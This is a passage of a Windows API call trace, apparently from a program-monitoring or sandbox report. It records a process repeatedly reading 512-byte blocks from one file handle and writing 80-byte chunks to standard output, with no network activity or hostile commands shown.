(_FileHandle=1) returned 0x50 [0233.030] GetFileType (hFile=0x50) returned 0x1 [0233.030] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.030] WriteFile (in: hFile=0x50, lpBuffer=0x1ef25c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef25c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.030] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.030] GetFileType (hFile=0x50) returned 0x1 [0233.030] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.030] WriteFile (in: hFile=0x50, lpBuffer=0x1ef2ac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef2ac*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.031] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.031] GetFileType (hFile=0x50) returned 0x1 [0233.031] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.031] WriteFile (in: hFile=0x50, lpBuffer=0x1ef2fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef2fc*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.031] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.031] GetFileType (hFile=0x50) returned 0x1 [0233.031] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.031] WriteFile (in: hFile=0x50, lpBuffer=0x1ef34c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef34c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.031] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.031] GetFileType (hFile=0x50) returned 0x1 [0233.031] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.031] WriteFile (in: hFile=0x50, lpBuffer=0x1ef39c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef39c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.031] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.031] GetFileType (hFile=0x50) returned 0x1 [0233.031] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.031] WriteFile (in: hFile=0x50, lpBuffer=0x1ef3ec*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef3ec*, lpNumberOfBytesWritten=0x1ee3f0*=0x20, lpOverlapped=0x0) returned 1 [0233.031] _get_osfhandle (_FileHandle=4) returned 0x58 [0233.031] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ee3dc | out: lpNewFilePointer=0x0) returned 1 [0233.031] _get_osfhandle (_FileHandle=4) returned 0x58 [0233.031] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.031] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.031] GetFileType (hFile=0x50) returned 0x1 [0233.031] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.031] GetFileType (hFile=0x50) returned 0x1 [0233.031] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.031] WriteFile (in: hFile=0x50, lpBuffer=0x1ef20c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.032] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.032] GetFileType (hFile=0x50) returned 0x1 [0233.032] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.032] WriteFile (in: hFile=0x50, lpBuffer=0x1ef25c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef25c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.032] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.032] GetFileType (hFile=0x50) returned 0x1 [0233.032] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.032] WriteFile (in: hFile=0x50, lpBuffer=0x1ef2ac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef2ac*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.032] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.032] GetFileType (hFile=0x50) returned 0x1 [0233.032] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.032] WriteFile (in: hFile=0x50, lpBuffer=0x1ef2fc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef2fc*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.032] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.032] GetFileType (hFile=0x50) returned 0x1 [0233.032] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.032] WriteFile (in: hFile=0x50, lpBuffer=0x1ef34c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef34c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.032] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.032] GetFileType (hFile=0x50) returned 0x1 [0233.032] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.032] WriteFile (in: hFile=0x50, lpBuffer=0x1ef39c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef39c*, lpNumberOfBytesWritten=0x1ee3f0*=0x50, lpOverlapped=0x0) returned 1 [0233.032] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.032] GetFileType (hFile=0x50) returned 0x1 [0233.032] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.032] WriteFile (in: hFile=0x50, lpBuffer=0x1ef3ec*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ee3f0, lpOverlapped=0x0 | out: lpBuffer=0x1ef3ec*, lpNumberOfBytesWritten=0x1ee3f0*=0x20, lpOverlapped=0x0) returned 1 [0233.032] _get_osfhandle (_FileHandle=4) returned 0x58 [0233.032] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ee3dc | out: lpNewFilePointer=0x0) returned 1 [0233.032] _get_osfhandle (_FileHandle=4) returned 0x58 [0233.032] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.033] _get_osfhandle (_FileHandle=1) returned 0x50 [0233.033] GetFileType (hFile=0x50) returned 0x1 [0233.033] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.033] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.033] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.033] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.033] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.033] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.033] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.033] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.034] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.034] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.034] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.034] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.034] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.034] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.034] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.034] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.034] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.034] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.035] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.035] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.035] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.035] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.035] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.035] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.035] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.035] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.035] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.035] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.035] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.035] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.036] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.036] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.036] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.036] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.036] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.036] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.036] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.036] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.036] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.036] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.036] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.037] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.037] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.037] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.037] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.037] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.037] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.037] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.037] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.037] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.037] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.037] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.038] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.038] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.038] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.038] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.038] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.038] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.038] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.038] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.038] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.038] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.038] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.039] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.039] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.039] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.039] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.039] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.039] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.039] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.039] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.039] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.039] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, lpOverlapped=0x0 | out: lpBuffer=0x1ef20c*, lpNumberOfBytesRead=0x1ee3fc*=0x200, lpOverlapped=0x0) returned 1 [0233.039] ReadFile (in: hFile=0x58, lpBuffer=0x1ef20c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee3fc, 